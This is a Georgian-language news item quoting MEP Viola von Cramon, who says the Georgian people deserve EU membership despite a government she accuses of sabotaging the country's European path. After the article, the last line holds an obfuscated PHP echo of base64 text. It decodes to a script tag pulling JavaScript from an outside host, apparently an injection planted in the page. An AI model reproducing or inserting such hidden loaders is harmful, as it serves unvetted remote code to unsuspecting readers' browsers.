celsiusi
ავერსი საქკაბელი

ქართველი ხალხი იმსახურებს ევროკავშირში ყოფნას, მიუხედავად იმისა, თუ მათი მოქმედი მთავრობა ამის ღირსი არ არის, – ამის შესახებ ევროპარლამენტარმა ვიოლა ფონ კრამონმა ევროპარლამენტში საქართველოში არსებული მდგომარეობის შესახებ გამართული დებატების დროს განაცხადა.

ევროპარლამენტარის განცხადებით, საქართველოს მთავრობას ქვეყნის ევროპული გეზის საბოტაჟი სურს, რასაც, მისი თქმით, ქართველი ხალხი არ ეთანხმება.

როგორც ვიოლა ფონ კრამონი აღნიშნავს, წინ მხოლოდ ერთი გზაა, რომელიც საქართველოს ევროპული მომავლისკენ მიდის.

„ყველა ნიღაბი საბოლოოდ მოხსნილია. საქართველოს მთავრობას ქვეყნის ევროპული გეზის საბოტაჟი სურს. საბედნიეროდ, ქართველი ხალხი ამას არ ეთანხმება. რუსულ ჭაობში დასაბრუნებელი გზა აღარ არსებობს. შეზღუდული თავისუფლებების და ავტოკრატიაში დაბრუნების გზა მოჭრილია. წინ მხოლოდ ერთი გზაა, რომელიც საქართველოს ევროპული მომავლისკენ მიდის. ქართველი ხალხი მათი მთავრობისგან რადიკალურად განსხვავებულია, ყველა გავიდა ქუჩებში, რათა მათი ხმა გაიგონ თბილისში, ბრიუსელში და, განსაკუთრებით, მოსკოვში. ისინი, ვინც თბილისის, ბათუმის ან ქუთაისის ქუჩებში იდგა, საუბრობდა ქართველების 80%-ზე მეტის სახელით. ევროპულ იდენტობას წყლის ჭავლით ვერ გადარეცხავთ. ევროკავშირის დროშით დაწვით ქართველების გულებიდან ევროპას ვერ ამოწვავთ. ძალადობა უსარგებლოა მათ წინააღმდეგ, ვინც თავისუფლებისთვის იბრძვის. საქართველოს კონსტიტუცია არის წმინდათაწმინდა და მისი 71-ე მუხლი მოითხოვს მთავრობისგან, უზრუნველყოს საქართველოს სრული ინტეგრაცია ევროკავშირსა და ნატო-ში. მიუხედავად ამისა, მთავრობამ ერთი ოლიგარქის და კრემლის ინტერესები დააყენა საქართველოს კონსტიტუციაზე მაღლა. როდესაც ძალაუფლების მქონეები ღალატობენ საკუთარ ხალხს, ეს ხალხი აჩვენებს ძალას. ახლა დროა, მიბაძოთ ქართველებს და იბრძოლოთ ევროპის მომავლისთვის. ქართველი ხალხი იმსახურებს ევროკავშირში ყოფნას, მიუხედავად იმისა, თუ მათი მოქმედი მთავრობა ამის ღირსი არაა“, – განაცხადა ვიოლა ფონ კრამონმა. 

171
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");